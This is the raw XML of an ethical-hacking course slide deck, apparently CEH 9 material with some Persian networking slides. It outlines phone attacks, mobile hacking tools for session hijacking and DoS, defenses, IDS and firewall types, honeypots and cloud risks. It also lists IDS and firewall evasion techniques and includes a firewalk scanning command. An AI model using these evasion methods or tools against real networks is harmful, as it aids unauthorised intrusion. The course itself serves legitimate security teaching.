            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Not a big deal; for us it is common sense.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Mainly Android &amp; iOS but also blackberry &amp; win</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Can be attacked or used for attack</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>You can make android VMs (x86 android VM)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Google Shape;639;p104"/>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Google Shape;644;p105"/>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Attacks toward phones</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p105"/>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Web &amp; Network</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Malware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Virus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Worm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Malware</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Backdoor</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Mining</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>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Social </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Engineering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SIM Swap</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Data Loss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Data theft</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574350" y="576900"/>
            <a:ext cx="2917200" cy="39960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a:t>اطلاعات پایه‌ای</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="411050"/>
            <a:ext cx="4699800" cy="4026600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>انواع شبکه</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>مدل هفت لایه ای شبکه</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>درک TCP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>آی پی سابنتینگ</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>درک هگز و باینری</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>پورت ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>دی ان اس</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>دیوایس‌های شبکه (روتر، سوییچ، IDS، IPS، Firewall و پروکسی)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>سیستم عامل‌ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>بک آپ</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p106"/>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Attacks via phones</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Google Shape;651;p106"/>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Its an advanced computer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Footprinting: nmap</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Scanning: Kismet shows devices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Exploitation: MITM, spoofing, ARP Poisoning,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Tools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Net (IP Tools, Fing, Packet Gen, Packet Capture)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Session </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hijack: DroidSheep, FaceNiff, SSL Strip</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DOS: LOIC</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Scanners: WPScan, CCTV Scan,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SQL Injection</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Proxy</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Web app testing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Wifi tool: Wifite (wifi cracking), Wigle (War Driving)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Pentest:  dSploit (map, finger pring,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Stay anonymous: Orbot, Orweb</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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107"/>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Defenses</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Google Shape;657;p107"/>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Backup</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Updates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Passwords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Encryption</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Signing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Common Sense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ACL/Permissions on programs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Isolation on extreme cases</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Google Shape;662;p108"/>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Evasion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Google Shape;663;p108"/>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In CEH 9</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>You should know how they try to capture / prevent you ;)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Firewall</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Evasion</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Google Shape;664;p108"/>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p109"/>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IDS tools</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670" name="Google Shape;670;p109"/>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IDS: Analyze, identify and report misuse of network/host</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NIDS: inspect packets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HIDS: host based; installed on servers (mainly win)</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LFMs (Log file monitors): look for patterns</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File </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integrity (like TripWire)</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How?</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Checks for anomalies, signatures, rules, ..</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Also it might checks for things that are not in its db (abnormal!)</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Protocol detection</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If anomaly passes a threshold, informs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Firewalls (can act as IDS too)</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DMZ : Buffer zone between public and private (also to expose some of the private)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Packet filtering: Network level (DST, SRC, Port, Protocol)</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Circuit Level Gateway: Session layer (can check if the session request is valid by checking TCP Handshake)</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App Level: Checks the app level data</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Stateful Multilayer Inspection: Combines all.</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Finding which firewall is running?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Portscanning</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewalking, </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>firewalk –S1-1024 -i &lt;interface&gt; -n -pTCP &lt;gateway IP&gt; &lt;target IP&gt;</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110"/>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Honeypots</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Google Shape;676;p110"/>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F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Concept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It is good to have them in your DMZ</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Low interaction: just a unsecure server</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High Interaction: A complete network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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0" name="Shape 680"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p111"/>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Evasion</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="682" name="Google Shape;682;p111"/>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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000" u="sng">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DoS or hack the the IDS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Insertion (IDS and Intended server will receive different packets)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Obfuscating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Crying Wolf</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Session Splicing (Fragmenting)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Fun with Flags (TCP flags)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bogus RST: Wrong checksum will result in IDS not to test the packet!</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sense of Urgency (URG Flag)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Encryption</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewalls</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000" u="sng">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IP Address spoofing</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Source routing ( you can plan the routing and bypass firewall!)</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Fragmentation (very small: TCP header info will go to the next packet!)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Bypass domain name by using IP directly!</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ICMP Tunnel (like Loki), ACK Tunneling (firewall may not check anything with ACK flag), HTTP Tunneling </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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6" name="Shape 686"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;p112"/>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Cloud</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Google Shape;688;p112"/>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In CEH 9</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Hypervisor can share CPUs, Memories, … between VMs</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Cloud can provide VM, Space, …</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Cloud can be 3rd party or your own company</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Benefits:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Self Service</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Measured (pay as you use)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Elasticity</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Pooling (sharing non-utilized resource)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Network Access</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Types</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>PaaS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>SaaS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>IaaS (like storage, computing, …)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Google Shape;689;p112"/>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3" name="Shape 693"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Google Shape;694;p113"/>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 Concerns</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Google Shape;695;p113"/>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All previous concerns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Where</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is the data?! In many places!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Are we locked in this provider? What happens IF price increases, company goes out of business, ….</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Easy to enter, difficult to go out</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EDoS: economic DOS. They can use your service and increase your prices! Or even access admin gui and order extra services.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Hypervisor / other programs / CPU bugs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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9" name="Shape 699"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
